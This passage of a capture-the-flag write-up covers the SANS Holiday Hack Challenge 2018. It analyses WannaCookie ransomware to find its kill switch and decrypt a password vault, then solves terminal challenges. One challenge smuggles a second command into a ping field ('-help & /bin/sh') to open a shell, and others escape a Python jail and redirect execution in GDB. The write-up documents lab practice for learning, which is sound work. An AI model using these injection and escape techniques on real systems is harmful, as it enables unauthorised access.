\noindent After downloading \textit{wannacookie.min.ps1} through the dropper, I reformatted the script to be a little more readable. I commented out the portion that encrypts the harddrive, and I set a breakpoint on the Hex to ASCII function (H2A) which was the last function to be called before the domain name was resolved. This is where I thought I should be able to see the domain name in clear text. Running the script, I was easily able to extract the kill switch name that needed to be registered as shown below:

\begin{figure}[H]
    \centering
    \includegraphics[scale=0.45]{objective9_malware_min}
    \caption{Screenshot of Debugging Powershell Malware}
\end{figure}

\paragraph{Answer: yippeekiyaa.aaay} \mbox{} \\
\noindent The following screenshots show the successful registration, and stopping the spread of the WannaCookie malware: 
\begin{figure}[H]
    \centering
	\subfloat[Screenshot of Registering the Domain]{\includegraphics[scale=0.1]{objective9_register_yippee}}
	\qquad
	\subfloat[Screenshot of Successful Registration]{\includegraphics[scale=0.1]{objective9_register_success}}
\end{figure}


\subsubsection{Recover Alabaster's Password}
Recover Alabaster's password as found in the the encrypted password vault.

\paragraph{Discussion}
\begin{flushleft}
\noindent After helping Alabaster stop the spread of the malware, he gave hints on how to recover his password with a tool called \href{https://github.com/chrisjd20/power_dump}{Power Dump}, about the existance of a non minimized of \textit{wannacookie.ps1}, and the following: \mbox{} \\
\end{flushleft}
\begin{centering}
\textit{Yippee-Ki-Yay! Now, I have a ma\ldots kill-switch!} \mbox{} \\ \mbox{} \\
\end{centering}
\begin{centering}
\textit{Now that we don't have to worry about new infections, I could sure use your L337 security skills for one last thing.} \mbox{} \\ \mbox{} \\
\end{centering}
\begin{centering}
\textit{As I mentioned, I made the mistake of analyzing the malware on my host computer and the ransomware encrypted my password database.} \mbox{} \\ \mbox{} \\
\end{centering}
\begin{centering}
\textit{Take this \href{https://www.holidayhackchallenge.com/2018/challenges/forensic_artifacts.zip}{zip} with a memory dump and my encrypted password database, and see if you can recover my passwords.} \mbox{} \\ \mbox{} \\
\end{centering}
\begin{centering}
\textit{One of the passwords will unlock our access to the vault so we can get in before the hackers.} \mbox{} \\ \mbox{} \\
\end{centering}

\noindent The zip file included in the challenge provided a memory dump and the encrypted password database file. After downloading the full version of \textit{wannacookie.ps1} through the previous DNS droppper method that was analyzed, I reviewed how the malware actually encrypts files on an infected host, and how they have functions built in to decrypt. It looked like they used Rivest, Adi Shamir, Leonard Adleman (RSA) which is an asymmetric encryption algorithm to encrypt a pre-shared Key used by Advanced Encryption Standard (AES) which is a symmetric encryption algorithm to encrypt the files on the infected host. My thought process was I needed to find the RSA private certificate to be able to decrypt the pre-shared key. With the pre-shared key I should be able to decrypt the password database. \mbox{} \\

\noindent I started by using the \textit{wannacookie.ps1} function \textit{get\_over\_dns} to download the public and private keys used for the RSA encryption. The script already showed that it downloaded the public key, I assumed I may be able to download the private key also. The following Powershell snippet shows how to use the existing \textit{wannacookie.ps1} to be able to download the public/private certificates (\textit{server.crt} being the public key ``7365727665722E637274'', and \textit{server.key} being the private key ``7365727665722E6B6579''), please note that converting the hex to ASCII is verbatim the filenames:

\begin{lstlisting}[language=Powershell, breaklines, escapeinside={(*}{*)}, columns=fullflexible, caption=Downloading Public and Private Certificates]
    (*\$*)public_key = (*\$*)(get_over_dns("7365727665722E637274"))
    (*\$*)private_key = (*\$*)(get_over_dns("7365727665722E6B6579"))
\end{lstlisting}

\noindent From examining \textit{wannacookie.ps1}, I knew that the encrypted pre-shared key was a hexadecimal string of length 512. From the hint about using Power Dump, I wrote a regular expression to search the PS variables for the encrypted pre-shared key of length 512 in hex format. Conveniently, there was only one blob in memory that met this criteria as shown in the following figure:

\begin{figure}[H]
    \centering
    \includegraphics[scale=0.45]{objective9_encrypted_psk}
    \caption{Encrypted Preshared Key}
\end{figure}

\noindent The following Python script was used to decrypt the pre-shared key:

\begin{lstlisting}[language=Python, breaklines, escapeinside={(*}{*)}, columns=fullflexible, caption=Script to Decrypt Preshared Key]
    import base64
    import zlib
    from Crypto.PublicKey import RSA
    from Crypto.Cipher import PKCS1_OAEP

    encrypted_blob = """
    3cf903522e1a3966805b50e7f7dd51dc7969c73cfb1663a75a56ebf4aa4a1849d1949005437dc44b8464dca056
    80d531b7a971672d87b24b7a6d672d1d811e6c34f42b2f8d7f2b43aab698b537d2df2f401c2a09fbe24c5833d2
    c5861139c4b4d3147abb55e671d0cac709d1cfe86860b6417bf019789950d0bf8d83218a56e69309a2bb17dced
    e7abfffd065ee0491b379be44029ca4321e60407d44e6e381691dae5e551cb2354727ac257d977722188a946c7
    5a295e714b668109d75c00100b94861678ea16f8b79b756e45776d29268af1720bc49995217d814ffd1e4b6edc
    e9ee57976f9ab398f9a8479cf911d7d47681a77152563906a2c29c6d12f971"""

    encrypted_blob = encrypted_blob.replace('\n','')
    encrypted_blob = encrypted_blob.decode('hex')

    def decrypt_blob(encrypted_blob, private_key):
        #Import the Private Key and use for decryption using PKCS1_OAEP
        rsakey = RSA.importKey(private_key)
        rsakey = PKCS1_OAEP.new(rsakey)

        #In determining the chunk size, determine the private key length used in bytes.
        #The data will be in decrypted in chunks
        chunk_size = 512
        offset = 0
        decrypted = ""

        #keep loop going as long as we have chunks to decrypt
        while offset < len(encrypted_blob):
            #The chunk
            chunk = encrypted_blob[offset: offset + chunk_size]

            #Append the decrypted chunk to the overall decrypted file
            decrypted += rsakey.decrypt(chunk)

            #Increase the offset by chunk size
            offset += chunk_size

        #return the decrypted data
        return decrypted

    #Use the private key for decryption
    fd = open("server.key", "rb")
    private_key = fd.read()
    fd.close()

    result = decrypt_blob(encrypted_blob, private_key)
    print result.encode('hex')
\end{lstlisting}

\noindent The following hash is the pre-shared key that is used for decrypting any files encrypted by the malware: \mbox{} \\
\noindent \textbf{\textit{fbcfc121915d99cc20a3d3d5d84f8308}} \mbox{} \\

\noindent To verify that this was the right value, I conducted one more test that the script used. The script calculated the SHA1 sum of the pre-shared key. This value is \textbf{\textit{b0e59a5e0f00968856f22cff2d6226697535da5b}}. I did a search in the memory dump for this string. Conveniently, there was only one value:

\begin{figure}[H]
    \centering
    \includegraphics[scale=0.45]{objective9_wannacookie_sha1}
    \caption{Power Dump Regular Expression to Find SHA1 Sums in PS Variables}
\end{figure}

\noindent The following Powershell snippet used \textit{wannacookie.ps1} functionality to decrypt the \textit{alabaster\_passwords.elfdb.wannacookie} database file:
\begin{lstlisting}[language=Powershell, breaklines, escapeinside={(*}{*)}, columns=fullflexible, caption=Script to Decrypt Preshared Key]
    (*\$*)akey = "fbcfc121915d99cc20a3d3d5d84f8308"
    (*\$*)akey = (*\$*)(H2B (*\$*)akey)[array]
    (*\$*)allcookies = (*\$*)(Get-ChildItem -Path (*\$*)((*\$*)env:userprofile) -Recurse  -Filter *.wannacookie | where (*{*) (*!*) (*\$*)_.PSIsContainer } | Foreach-Object (*{*) (*\$*)_.Fullname})
    enc_dec (*\$*)akey (*\$*)allcookies (*\$*)false
\end{lstlisting}

\paragraph{Answer: ED\#ED\#EED\#EF\#G\#F\#G\#ABA\#BA\#B} \mbox{} \\ \mbox{} \\
\noindent The following passwords were able to be recovered after the sql database was decrypted:
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.45]{objective9_passwords}
    \caption{Screenshot of Passwords Found in Alabaster's Database}
\end{figure}


\subsection{Who Is Behind It All?}
\subsubsection{Objective}
Who was the mastermind behind the whole KringleCon plan? And, in your \href{mailto:SANSHolidayHackChallenge@counterhack.com}{emailed answers} please explain that plan.

\subsubsection{Discussion}
After recovering the passwords, it became evident that the password was a musical password. Alabaster gave the following hint: \textit{``Really, it's Mozart. And it should be in the key of D, not E.''}. I also remember the e-mail from Holly Evergreen to Alabaster Snowball that had instructions on how to \hyperref[transpose_music]{\bfseries{transpose music}}. The following figure shows the music transposition of his password from E to D and the follow on success:
\begin{figure}[H]
    \centering
	\subfloat[Screenshot of Alabaster's Piano Password]{\includegraphics[scale=0.25]{piano_password}}
	\qquad
	\subfloat[Screenshot of Successful Piano Password]{\includegraphics[scale=0.25]{piano_congrats}}
\end{figure}

\noindent Upon entering the room, it became evident that Santa had devised KringleCon and the challenges as a test to find a great defender, and that the elves were dressed as the Toy Soldiers to help in the scheme.

\subsubsection{Answer: Santa}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{santa}
    \caption{Screenshot Chilling with Santa}
\end{figure}
What Santa said upon completion:
\begin{center}
\textit{You DID IT!\ You completed the hardest challenge. You see, Hans and the soldiers work for ME.\ I had to test you. And you passed the test!\ }
\end{center}
\begin{center}
\textit{You WON!\ Won what, you ask? Well, the jackpot, my dear! The grand and glorious jackpot!\ }
\end{center}
\begin{center}
\textit{You see, I finally found you!}
\end{center}
\begin{center}
\textit{I came up with the idea of KringleCon to find someone like you who could help me defend the North Pole against even the craftiest attackers.}
\end{center}
\begin{center}
\textit{That’s why we had so many different challenges this year.}
\end{center}
\begin{center}
\textit{We needed to find someone with skills all across the spectrum.}
\end{center}
\begin{center}
\textit{I asked my friend Hans to play the role of the bad guy to see if you could solve all those challenges and thwart the plot we devised.}
\end{center}
\begin{center}
\textit{And you did!}
\end{center}
\begin{center}
\textit{Oh, and those brutish toy soldiers? They are really just some of my elves in disguise.}
\end{center}
\begin{center}
\textit{See what happens when they take off those hats?}
\end{center}
\begin{center}
\textit{Based on your victory… next year, I’m going to ask for your help in defending my whole operation from evil bad guys.}
\end{center}
\begin{center}
\textit{And welcome to my vault room. Where's my treasure? Well, my treasure is Christmas joy and good will.}
\end{center}
\begin{center}
\textit{You did such a GREAT job! And remember what happened to the people who suddenly got everything they ever wanted?}
\end{center}
\begin{center}
\textit{They lived happily ever after.}
\end{center}


\section{Cranberry Pi Terminal Challenges}

\subsection{Essential Skills}\label{cranberry_pi_essential_skills}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{essential_editor_skills_challenge}
    \caption{Screenshot of Essential Editor Skills Challenge}
\end{figure}

\subsubsection{Discussion}
Bushy Evergreen gave the following commentary to start:
\begin{center}
\textit{I'm glad you're here, I'm the target of a terrible trick.}
\end{center}
\begin{center}
\textit{Pepper says his editor is the best, but I don't understand why.}
\end{center}
\begin{center}
\textit{He's forcing me to learn vi.}
\end{center}
\begin{center}
\textit{He gave me a link, I'm supposed to learn the basics.}
\end{center}
\begin{center}
\textit{Can you assist me with one of the simple cases?}
\end{center}

I use vi a decent amount which is the text editor used in this challenge. I even used it to write this paper, so solving it was second nature. VIM Adventures is a fun website to help you learn: \href{https://vim-adventures.com}{https://vim-adventures.com}. Bushy Evergreen also provided the hint of checking out the Indiana University Knowledge Base on how to quit vi: \href{https://kb.iu.edu/d/afcz}{https://kb.iu.edu/d/afcz}.

\subsubsection{Answer}
Exiting was as simple as typing in the following snippet (please note that the line number is not part of what is typed):

\begin{lstlisting}[language=bash, breaklines, escapeinside={(*}{*)}, columns=fullflexible, caption=Essential Skills Command Snippet]
	:q\end{lstlisting}

\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{essential_editor_skills_solve}
    \caption{Screenshot of Solving the Essential Editor Skills Challenge}
\end{figure}

\subsubsection{Hint Provided}\label{cranberry_pi_essential_skills_hint}
Bushy Evergreen stated:
\begin{center}
\textit{To thank you, I'd like to share some other tips with you.}
\end{center}
\begin{center}
\textit{Have you taken a look at the Orientation Challenge?}
\end{center}
\begin{center}
\textit{This challenge is limited to past SANS Holiday Hack Challenges from 2015, 2016, and 2017. You DO NOT need to play those challenges.}
\end{center}
\begin{center}
\textit{If you listen closely to Ed Skoudis' talk at the con, you might even pick up all the answers you need\ldots}
\end{center}
\begin{center}
\textit{It may take a little poking around, but with your skills, I'm sure it'll be a wintergreen breeze!}
\end{center}
Bushy Evergreen also said to check out the following link: \href{https://holidayhackchallenge.com/past-challenges/}{https://holidayhackchallenge.com/past-challenges/}. It was trivial to search by year to answer the questions for the overall Orientation Challenge, and to showcase all the cool challenges over the years.

\subsection{The Name Game}\label{cranberry_pi_the_name_game}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{the_name_game_challenge}
    \caption{Screenshot of The Name Game Challenge}
\end{figure}

\subsubsection{Discussion}
Minty Candycane provided a nice hint upfront on this challenge:

\begin{center}
\textit{The Santa's Castle Onboarding System? I think it's written in PowerShell, if I'm not mistaken.}
\end{center}
\begin{center}
\textit{PowerShell itself can be tricky when handling user input. Special characters such as \& and~; can be used to inject commands.}
\end{center}
\begin{center}
\textit{I think that system is one of Alabaster's creations.}
\end{center}
\begin{center}
\textit{He's a little \ldots obsessed with SQLite database storage.}
\end{center}
\begin{center}
\textit{I don't know much about SQLite, just the~.dump command.}
\end{center}
The Name Game provides a pretty obvious command injection vulnerability under option 2 that verifies the system with a ping command. By putting an ampersand, an arbitrary command can be run. In this case a shell was created to be able to individually examine the SQL database. Under option 1, there is also a SQL injection vulnerability. Attacking option 1 was the more involved option out of the two presented, so I decided to go after the easier of the two methods. After gaining a shell, standard SQL commands were used to find Mr.\ Chan's first name. I could have used \textit{.dump} as instructed, but I decided to refine the query to what I needed.

\subsubsection{Answer}
To complete the challenge input the text in bold from the following snippet in \autoref{fig:the_name_game_solve_snippet}. The result is at \autoref{fig:the_name_game_solve_screenshot}: \nameref{fig:the_name_game_solve_screenshot}.

\begin{lstlisting}[language=bash, breaklines, escapeinside={(*}{*)}, columns=fullflexible, caption=How to Solve the Challenge]
	Please make a selection: (*\textbf{2}*)
	Validating data store for employee onboard information.
	Enter address of server: (*\textbf{-help \& /bin/sh}*)
	(*\$*) Usage: ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface]
				[-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
				[-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
				[-w deadline] [-W timeout] [hop1 \ldots] destination
	(*\textbf{ls}*)
	menu.ps1  onboard.db  runtoanswer
	(*\textbf{\$ sqlite3 onboard.db}*)
	SQLite version 3.11.0 2016-02-15 17:29:24
	Enter ".help" for usage (*hints*).
	sqlite> (*\textbf{.databases}*)
	seq  name             file
	---  ---------------  ---------------------------------------------------
	0    main             /home/elf/onboard.db
	sqlite> (*\textbf{.tables}*)
	onboard
	sqlite> (*\textbf{PRAGMA table\_info(onboard);}*)
	0|id|INTEGER|0||1
	1|fname|TEXT|1||0
	2|lname|TEXT|1||0
	3|street1|TEXT|0||0
	4|street2|TEXT|0||0
	5|city|TEXT|0||0
	6|postalcode|TEXT|0||0
	7|phone|TEXT|0||0
	8|email|TEXT|0||0
	sqlite> (*\textbf{select *\ from onboard where lname=``Chan'';}*)
	(*\textbf{84|Scott|Chan|48 Colorado Way||Los Angeles|90067|4017533509|scottmchan90067@gmail.com}*)
	sqlite> (*\textbf{.quit}*)
	(*\$ \textbf{./runtoanswer}*)
	(*\ldots*)
	Enter Mr. Chan's first name: (*\textbf{Scott}*)
\end{lstlisting}

\begin{figure}[H]
	\centering
		\includegraphics[scale=0.25]{the_name_game_solve}
	\caption{Screenshot of Solving the Name Game Challenge}\label{fig:the_name_game_solve_screenshot}
\end{figure}

\subsubsection{Hint Provided}\label{cranberry_pi_the_name_game_hint}
Minty Candycane stated:

\begin{center}
\textit{Have you ever visited a website and seen a listing of files --- like you're browsing a directory? Sometimes this is enabled on web servers.}
\end{center}
\begin{center}
\textit{This is generally unwanted behavior. You can find sleighloads of examples by searching the web for index.of.}
\end{center}
\begin{center}
\textit{On a website, it's sometimes as simple as removing characters from the end of a URL.}
\end{center}
\begin{center}
\textit{What a silly misconfiguration for leaking information!}
\end{center}
Minty Candycane also provided the following hint: \textit{On a website, finding browsable directories is sometimes as simple as removing characters from the end of a URL.}

\subsection{Lethal ForensicELFication}\label{cranberry_pi_lethal_forensicelfication}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{lethal_forensicelfication_challenge}
    \caption{Screenshot of the Lethal ForensicELFication Challenge}
\end{figure}

\subsubsection{Discussion}
In the problem description, \textit{Certain text editors can leave some clue}. Tangle Coalbox also provided a hint on \href{https://tm4n6.com/2017/11/15/forensic-relevance-of-vim-artifacts/}{Forensic Relevance of Vim Artifacts}. This led to a key string replacement of Elinore to NEVERMORE as shown below from /home/elf/.secrets/her/poem.txt in the~.viminfo file.

\begin{lstlisting}[language=bash, breaklines, escapeinside={(*}{*)}, columns=fullflexible, caption=String Replacement in~.viminfo]
	|2,0,1536607217,,"%s/Elinore/NEVERMORE/g"
\end{lstlisting}

\subsubsection{Answer: Elinore}
\begin{figure}[H]
	\centering
		\includegraphics[scale=0.25]{lethal_forensicelfication_solve}
	\caption{Screenshot of Solving the Lethal ForensicELFication Challenge}\label{fig:lethal_forensicelfication_screenshot}
\end{figure}

\subsubsection{Hint Provided}\label{cranberry_pi_lethal_forensicelfication_hint}
Tangle Coalbox provided a hint on a \href{http://www.hakank.org/comb/debruijn.cgi}{de Bruijn Sequence Generator}. Tangle then stated:

\begin{center}
\textit{Have you been able to solve the lock with the funny shapes?}
\end{center}
\begin{center}
\textit{It reminds me of something called ``de Bruijn Sequences.''}
\end{center}
\begin{center}
\textit{You can optimize the guesses because there is no start and stop --- each new value is added to the end and the first is removed.}
\end{center}
\begin{center}
\textit{I've even seen de Bruijn sequence generators online.}
\end{center}
\begin{center}
\textit{Here the length of the alphabet is 4 (only 4 buttons) and the length of the PIN is 4 as well.}
\end{center}
\begin{center}
\textit{Mathematically this is k=4, n=4 to generate the de Bruijn sequence.}
\end{center}
\begin{center}
\textit{Math is like your notepad and pencil --- can't leave home without it!}
\end{center}


\subsection{Stall Mucking Report}\label{cranberry_pi_stall_mucking_report}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{stall_mocking_report_challenge}
    \caption{Screenshot of the Stall Mocking Report Challenge}
\end{figure}

\subsubsection{Discussion}
Wunorse Openslae stated:
\begin{center}
\textit{What was that password?}
\end{center}
\begin{center}
\textit{Golly, passwords may be the end of all of us. Good guys can't remember them, and bad guess can guess them!}
\end{center}
\begin{center}
\textit{I've got to upload my chore report to my manager's inbox, but I can't remember my password.}
\end{center}
\begin{center}
\textit{Still, with all the automated tasks we use, I'll bet there's a way to find it in memory\ldots}
\end{center}

Wunorse Openslae also provided a hint about \href{https://blog.rackspace.com/passwords-on-the-command-line-visible-to-ps}{Plaintext Credentials in Commands}. The following process dump provides all the information to connect to the share, and upload the file.
\begin{figure}[H]
	\centering
		\includegraphics[scale=0.25]{stall_mocking_report_processdump}
	\caption{Process Dump with Key Information to Mount the Share}
\end{figure}
\begin{figure}[H]
	\centering
		\includegraphics[scale=0.25]{stall_mocking_report_mount}
	\caption{Connecting to the Share with smbclient and Uploading the Report}
\end{figure}

\subsubsection{Answer}
\begin{figure}[H]
	\centering
		\includegraphics[scale=0.25]{stall_mocking_report_solve}
	\caption{Screenshot of Solving the Stall Mocking Report Challenge}\label{fig:stall_mocking_report_screenshot}
\end{figure}

\subsubsection{Hint Provided}\label{cranberry_pi_stall_mucking_report_hint}
Wunorse Openslae provided the following hint:
\begin{center}
\textit{Speaking of good ways to find credentials, have you heard of \href{https://github.com/dxa4481/truffleHog}{Trufflehog}?}
\end{center}
\begin{center}
\textit{It's a cool way to dig through repositories for passwords, RSA keys, and more.}
\end{center}
\begin{center}
\textit{I mean, no one EVER uploads sensitive credentials to public repositories, right? But if they did, this would be a great tool for finding them.}
\end{center}
\begin{center}
\textit{But hey, listen to me ramble. If you're interested in \href{https://github.com/dxa4481/truffleHog}{Trufflehog}, you should check out Brian Hostetler's talk!}
\end{center}
\begin{center}
\textit{Have you tried the entropy=True option when running \href{https://github.com/dxa4481/truffleHog}{Trufflehog}? It is amazing how much deeper it will dig!}
\end{center}


\subsection{CURLing Master}\label{cranberry_pi_curling_master}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{curling_master_challenge}
    \caption{Screenshot of the CURLing Master Challenge}
\end{figure}

\subsubsection{Discussion}
Holly Evergreen gave a hint to start the CURLing Master Challenge:
\begin{center}
\textit{Oh that Bushy!}
\end{center}
\begin{center}
\textit{Sorry to vent, but that brother of mine did something strange.}
\end{center}
\begin{center}
\textit{The trigger to restart the Candy Striper is apparently an arcane HTTP call or 2.}
\end{center}
\begin{center}
\textit{I sometimes wonder if all IT folk do strange things with their home networks\ldots}
\end{center}

\noindent The first thing I did was to look around the home directory. In the Bash History there was a \textit{curl} command that looked interesting since it was making a http2 request as the challenge asked for.
\begin{figure}[H]
	\centering
		\includegraphics[scale=0.25]{curling_master_bash_history}
	\caption{Bash History with Curl Command}
\end{figure}

\noindent I tried to run the query, and I was given a clear message to turn on the Candy Striper by setting the parameter \textit{``status=on''}. By adding the data parameter to the \textit{curl} command, I was able to successfully turn on the Candy Striper.
\begin{figure}[H]
	\centering
		\includegraphics[scale=0.25]{curling_master_curl_command}
	\caption{Curl Command to Turn on Candy Striper}
\end{figure}

\subsubsection{Answer}
\begin{figure}[H]
	\centering
		\includegraphics[scale=0.25]{curling_master_solve}
	\caption{Screenshot of Solving the CURLing Master Challenge}\label{fig:curling_master_screenshot}
\end{figure}

\subsubsection{Hint Provided}\label{cranberry_pi_curling_master_hint}
Holly Evergreen provided the following hint:
\begin{center}
\textit{Unencrypted HTTP/2? What was he thinking? Oh well.}
\end{center}
\begin{center}
\textit{Have you ever used Bloodhound for testing Active Directory implementations?}
\end{center}
\begin{center}
\textit{It's a merry little tool that can sniff AD and find paths to reaching privileged status on specific machines.}
\end{center}
\begin{center}
\textit{AD implementations can get so complicated that administrators may not even know what paths they've set up that attackers might exploit.}
\end{center}
\begin{center}
\textit{Have you seen anyone demo the tool before?}
\end{center}


\subsection{Yule Log Analysis}\label{cranberry_pi_yule_log_analysis}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{yule_log_analysis_challenge}
    \caption{Screenshot of the Yule Log Analysis Challenge}
\end{figure}

\subsubsection{Discussion}
Pepper Ministix gives a hint on how to start the Yule Log Analysis Challenge:
\begin{center}
\textit{Have you heard of password spraying? It seems we've been victim.}
\end{center}
\begin{center}
\textit{We fear that they were successful in accessing one of our Elf Web Access accounts, but we don't know which one.}
\end{center}
\begin{center}
\textit{Parsing through~.evtx files can be tricky, but there's a Python script that can help you convert it into XML for easier grep'ing.}
\end{center}
Using the hint about easy grepping, I used the script on the host to put the event log in a more readable format.
\begin{lstlisting}[language=bash, breaklines, escapeinside={(*}{*)}, columns=fullflexible, caption=Exporting Event Log in Readable Format]
	(*\$*) evtx_dump.py ho-ho-no.evtx > /tmp/event.log
	(*\$*) less /tmp/event.log
\end{lstlisting}

\noindent I used the \textit{less} command to examine the file and to search through it. Joe Ziemba had a great article explaining how to \href{https://www.ziemba.ninja/?p=66}{Detect Password Spraying With Windows Event Log Correlation}. The first part of analysis consists of looking for Windows Event ID 4625, which is an account that failed to log on. If the status is 0xc000006d (bad username or password) and the sub status is either 0xc0000064 (no such user) or 0xc000006a (good username bad password) along with repeated attempts over a 24 hour period there is strong evidence that password spraying had occurred. \\

\noindent It became pretty evident that the attacking IP address was: \textit{172.31.254.101}. \\

\noindent The next step was to look for a successful login from the \textit{172.31.254.101} IP address. Searching for Windows Event ID 1624, an account was successfully logged on. This search yielded one result as shown by the following screenshot:
\begin{figure}[H]
	\centering
		\includegraphics[scale=0.25]{yule_log_analysis_success_logon}
	\caption{Screenshot of Successful Login by Attacker into Minty Candycane's Account}
\end{figure}

\subsubsection{Answer: minty.candycane}
\begin{figure}[H]
	\centering
		\includegraphics[scale=0.25]{yule_log_analysis_solve}
	\caption{Screenshot of Solving the Yule Log Analysis Challenge}\label{fig:yule_log_analysis_screenshot}
\end{figure}

\subsubsection{Hint Provided}\label{cranberry_pi_yule_log_analysis_hint}
Pepper Ministix provided the following hint:
\begin{center}
\textit{All of the Kringle Castle employees have these cool cards with QR codes on them that give us access to restricted areas.}
\end{center}
\begin{center}
\textit{Unfortunately, the badge-scan-o-matic said my account was disabled when I tried scanning my badge.}
\end{center}
\begin{center}
\textit{I really needed access so I tried scanning several QR codes I made from my phone but the scanner kept saying ``User Not Found''.}
\end{center}
\begin{center}
\textit{I researched a SQL database error from scanning a QR code with special characters in it and found it may contain an injection vulnerability.}
\end{center}
\begin{center}
\textit{I was going to try some variations I found on \href{https://www.owasp.org/index.php/SQL\_Injection\_Bypassing\_WAF\#Auth\_Bypass}{OWASP} but decided to stop so I don't tick-off Alabaster.}
\end{center}


\subsection{Dev Ops Fail}\label{cranberry_pi_dev_ops_fail}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{dev_ops_fail_challenge}
    \caption{Screenshot of the Dev Ops Fail Challenge}
\end{figure}

\subsubsection{Discussion}
Sparkle Redberry hinted at leaving a password in her git repo. The command \textit{git log} shows a listing of all the commits with comments. On November 8th there were two commits one stating that a hard coded password was removed. The other commit actually had the password removed. This is denoted in red text as shown below in the figure. The command \textit{git diff} with a commit hash will show the differences between files in a given commit as shown in the figure below. The password found was \textit{twinkletwinkletwinkle}.
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{dev_ops_fail_git_log}
    \caption{\textit{git log} Command Showing Where Password was Removed}
\end{figure}

\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{dev_ops_fail_password}
    \caption{\textit{git diff} of Commit where Password was Removed}
\end{figure}

\subsubsection{Answer}
\begin{figure}[H]
	\centering
		\includegraphics[scale=0.25]{dev_ops_fail_solve}
	\caption{Screenshot of Solving the Dev Ops Fail Challenge}\label{fig:dev_ops_fail_screenshot}
\end{figure}

\subsubsection{Hint Provided}\label{cranberry_pi_dev_ops_fail_hint}
Sparkle Redberry provided the following hint:

\begin{center}
\textit{Oh my golly gracious --- Tangle was right? It was still in there? How embarrassing!}
\end{center}
\begin{center}
\textit{Well, if I can try to redeem myself a bit, let me tell you about another challenge you can help us with.}
\end{center}
\begin{center}
\textit{I wonder if Tangle Coalbox has taken a good look at his own employee import system.}
\end{center}
\begin{center}
\textit{It takes CSV files as imports. That certainly can expedite a process, but there's danger to be had.}
\end{center}
\begin{center}
\textit{I'll bet, with the right malicious input, some naughty actor could exploit a vulnerability there.}
\end{center}
\begin{center}
\textit{I'm sure the danger can be mitigated. OWASP has guidance on what not to allow with such oploads.}
\end{center}


\subsection{Python Escape from LA}\label{cranberry_pi_python_escape_from_la}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{python_escape_from_la_challenge}
    \caption{Screenshot of the Python Escape from LA Challenge}
\end{figure}

\subsubsection{Discussion}
I started by looking at what was available in the Python jail by using a \textit{dir()} command. Of interest was the code module that implements read-eval-print loops in Python, and specifically the interact function. Running \textit{code.interact()} removed all restrictions of the jail. I then spawned a python tty shell and ran the \textit{i\_escaped} executable to solve the challenge. % chktex 36

\begin{figure}[H]
	\centering
		\includegraphics[scale=0.25]{python_escape_from_la_commands}
	\caption{Commands to Break out of the Python Jail}
\end{figure}

\subsubsection{Answer}
\begin{figure}[H]
	\centering
		\includegraphics[scale=0.25]{python_escape_from_la_solve}
	\caption{Screenshot of Solving the Python Escape From LA Challenge}\label{fig:python_escape_from_la_screenshot}
\end{figure}

\subsubsection{Hint Provided}\label{cranberry_pi_python_escape_from_la_hint}
SugarPlum Mary provided the following hint:
\begin{center}
\textit{As a token of my gratitude, I would like to share a rumor I had heard about Santa's new web-based packet analyzer --- Packalyzer.}
\end{center}
\begin{center}
\textit{Another elf told me that Packalyzer was rushed and deployed with development code sitting in the web root.}
\end{center}
\begin{center}
\textit{Apparently, he found this out by looking at HTML comments left behind and was able to grab the server-side source code.}
\end{center}
\begin{center}
\textit{There was suspicious-looking development code using environment variables to store SSL keys and open up directories.}
\end{center}
\begin{center}
\textit{This elf then told me that manipulating values in the URL gave back weird and descriptive errors.}
\end{center}
\begin{center}
\textit{I'm hoping these errors can't be used to compromise SSL on the website and steal logins.}
\end{center}
\begin{center}
\textit{On a tooootally unrelated note, have you seen the HTTP2 talk at at KringleCon by the Chrises? I never knew HTTP2 was so different!}
\end{center}


\subsection{Sleigh Bell Lottery}\label{cranberry_pi_sleigh_bell_lottery}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{sleigh_bell_lottery_challenge}
    \caption{Screenshot of the Sleigh Bell Lottery Challenge}
\end{figure}

\subsubsection{Discussion}
Shiny Upatree gave the following info to help with the challenge:
\begin{center}
\textit{Hey! Mind giving ole' Shinny Upatree some help? There's a contest I HAVE to win.}
\end{center}
\begin{center}
\textit{As long as no one else wins first, I can just keep trying to win the Sleigh Bell Lotto, but this could take forever!}
\end{center}
\begin{center}
\textit{I'll bet the GNU Debugger can help us. With the PEDA modules installed, it can be prettier. I mean easier.}
\end{center}
I am already pretty familiar with GDB, so I didn't count on the PEDA modules. A quick look at the main function gave me everything I needed. There are probably a few different ways to solve this, but the most natural way for me was to set the instruction pointer (rip) to calling the winnerwinner function. There were no parameters passed to this function. The address I chose was the instruction before setting eax to zero. This was unnecessary, but I liked that it zeroed out eax first. The next instruction called the winnerwinner function. I also set the disassembly syntax to Intel from the AT\&T default, which is just a preference. Another way to solve the problem is to change the value of \$ebp-0$\times$4 to the comparision value of 0$\times$4c9.
\begin{figure}[H]
	\centering
		\includegraphics[scale=0.25]{sleigh_bell_lottery_jump}
	\caption{Jump to winnerwinner Function}
\end{figure}

\begin{figure}[H]
\begin{lstlisting}[language=bash, escapeinside={(*}{*)}, columns=fullflexible, caption=GDB Commands to Solve the Problem]
	(*\$*) gdb sleighbell-lotto
	(gdb) set disassembly-flavor intel
	(gdb) break main
	(gdb) run
	(gdb) set (*\$*)rip=0x000055555555558b
	(gdb) continue
\end{lstlisting}
\end{figure}

\subsubsection{Answer}
\begin{figure}[H]
	\centering
		\includegraphics[scale=0.25]{sleigh_bell_lottery_solve}
	\caption{Screenshot of Solving the Sleigh Bell Lottery Challenge}\label{fig:sleigh_bell_lottery_screenshot}
\end{figure}

\subsubsection{Hint Provided}\label{cranberry_pi_sleigh_bell_lottery_hint}
Shinny Upatree provided the following hint:
\begin{center}
